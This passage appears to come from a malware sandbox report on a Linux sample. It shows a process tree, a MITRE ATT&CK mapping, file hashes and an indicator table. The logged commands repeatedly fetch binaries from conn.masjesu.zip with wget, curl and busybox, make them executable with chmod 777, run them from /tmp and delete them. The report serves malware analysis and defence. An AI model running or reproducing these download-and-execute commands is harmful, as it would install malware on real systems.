./YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X
2⤵
- Executes dropped EXE
PID:976

/bin/rm
rm YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X
2⤵
PID:977

/usr/bin/wget
wget http://conn.masjesu.zip/bins/x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK
2⤵
- System Network Configuration Discovery
PID:978

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK
2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:979

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK
2⤵
PID:981

/bin/chmod
chmod 777 x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK
2⤵
- File and Directory Permissions Modification
PID:982

/tmp/x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK
./x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK
2⤵
- Executes dropped EXE
PID:983

/bin/rm
rm x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK
2⤵
PID:985

/usr/bin/wget
wget http://conn.masjesu.zip/bins/qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m
2⤵
- System Network Configuration Discovery
PID:986

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m
2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:987

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m
2⤵
PID:989

/bin/chmod
chmod 777 qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m
2⤵
- File and Directory Permissions Modification
PID:990

/tmp/qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m
./qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m
2⤵
- Executes dropped EXE
PID:991

/bin/rm
rm qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m
2⤵
PID:992

/usr/bin/wget
wget http://conn.masjesu.zip/bins/200cUyejdGjWDM9heC9D1Qq26iolWznBRb
2⤵
- System Network Configuration Discovery
PID:993

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/200cUyejdGjWDM9heC9D1Qq26iolWznBRb
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:994

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/200cUyejdGjWDM9heC9D1Qq26iolWznBRb
2⤵
- System Network Configuration Discovery
PID:996

/bin/chmod
chmod 777 200cUyejdGjWDM9heC9D1Qq26iolWznBRb
2⤵
- File and Directory Permissions Modification
PID:997

/tmp/200cUyejdGjWDM9heC9D1Qq26iolWznBRb
./200cUyejdGjWDM9heC9D1Qq26iolWznBRb
2⤵
- Executes dropped EXE
PID:998

/bin/rm
rm 200cUyejdGjWDM9heC9D1Qq26iolWznBRb
2⤵
PID:999

/usr/bin/wget
wget http://conn.masjesu.zip/bins/Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ2
2⤵
- System Network Configuration Discovery
PID:1000

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ2
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1001

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ2
2⤵
- System Network Configuration Discovery
PID:1003

/bin/chmod
chmod 777 Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ2
2⤵
- File and Directory Permissions Modification
PID:1004

/tmp/Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ2
./Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ2
2⤵
- Executes dropped EXE
PID:1005

/bin/rm
rm Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ2
2⤵
PID:1006

/usr/bin/wget
wget http://conn.masjesu.zip/bins/8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX
2⤵
- System Network Configuration Discovery
PID:1007

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1008

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX
2⤵
- System Network Configuration Discovery
PID:1010

/bin/chmod
chmod 777 8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX
2⤵
- File and Directory Permissions Modification
PID:1011

/tmp/8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX
./8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX
2⤵
- Executes dropped EXE
PID:1012

/bin/rm
rm 8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX
2⤵
PID:1013

/usr/bin/wget
wget http://conn.masjesu.zip/bins/alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA
2⤵
- System Network Configuration Discovery
PID:1014

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA
2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1015

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA
2⤵
- System Network Configuration Discovery
PID:1017

/bin/chmod
chmod 777 alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA
2⤵
- File and Directory Permissions Modification
PID:1018

/tmp/alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA
./alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA
2⤵
- Executes dropped EXE
PID:1019

/bin/rm
rm alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA
2⤵
PID:1021

/usr/bin/wget
wget http://conn.masjesu.zip/bins/iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz
2⤵
PID:1022

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz
2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1023

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz
2⤵
- System Network Configuration Discovery
PID:1025

/bin/chmod
chmod 777 iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz
2⤵
- File and Directory Permissions Modification
PID:1026

/tmp/iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz
./iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz
2⤵
- Executes dropped EXE
PID:1027

/bin/rm
rm iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz
2⤵
PID:1029

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

1

T1222

Linux and Mac File and Directory Permissions Modification

1

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

1

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit
/tmp/xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc

Filesize
16B

MD5
7689ca8c5bc85cf6b78ef89323d4df6a

SHA1
a1392ec3b571b3de167f0b9a5dadab4f14a2db76

SHA256
17dcc5c5df80bfe98d30dd8eb7e0de5875d0e4560a0f23e5acb0b13ef1a1a3c5

SHA512
40f543b232d42b9b7796382c15de33e682111685ad7ae87be455d0d8d3e48866dfc137f4555b8bc6bf03ac5dde233c8f20e8c4f220c05c71892de0ce14691471

Download Submit

ioc	pid	process
/tmp/xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc	746	xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc
/tmp/ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i	755	ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i
/tmp/YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X	768	YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X
/tmp/x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK	793	x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK
/tmp/qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m	822	qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m
/tmp/200cUyejdGjWDM9heC9D1Qq26iolWznBRb	830	200cUyejdGjWDM9heC9D1Qq26iolWznBRb
/tmp/Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ2	840	Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ2
/tmp/8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX	859	8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX
/tmp/alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA	880	alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA
/tmp/iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz	893	iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz
/tmp/O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp	901	O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp
/tmp/Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz	908	Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz
/tmp/hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G1	916	hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G1
/tmp/3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd	923	3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd
/tmp/O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp	931	O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp
/tmp/Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz	938	Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz
/tmp/hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G1	946	hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G1
/tmp/3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd	953	3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd
/tmp/xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc	960	xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc
/tmp/ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i	968	ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i
/tmp/YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X	976	YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X
/tmp/x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK	983	x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK
/tmp/qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m	991	qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m
/tmp/200cUyejdGjWDM9heC9D1Qq26iolWznBRb	998	200cUyejdGjWDM9heC9D1Qq26iolWznBRb
/tmp/Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ2	1005	Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ2
/tmp/8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX	1012	8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX
/tmp/alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA	1019	alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA
/tmp/iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz	1027	iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads